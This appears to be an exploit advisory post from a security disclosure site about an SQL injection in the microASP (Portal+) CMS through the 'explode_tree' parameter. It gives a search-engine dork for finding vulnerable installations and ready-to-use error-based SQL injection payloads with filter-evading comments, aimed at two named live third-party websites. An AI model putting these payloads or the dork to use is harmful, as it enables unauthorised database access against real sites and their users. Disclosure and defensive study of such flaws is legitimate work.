microASP (Portal+) CMS SQL Injection

2019.05.07
Credit: Felipe Andrian Peixoto
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;)

[+] Sql Injection on microASP (Portal+) CMS [+] Date: 05/05/2019 [+] Risk: High [+] CWE Number : CWE-89 [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: http://www.microasp.it/ [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Gnu/Linux [+] Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;) [+] Exploit : http://host/patch/pagina.phtml?explode_tree= [SQL Injection] [+] PoC : https://www.hedler.it/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+- https://www.camboitalia.it/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- [+] EOF


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top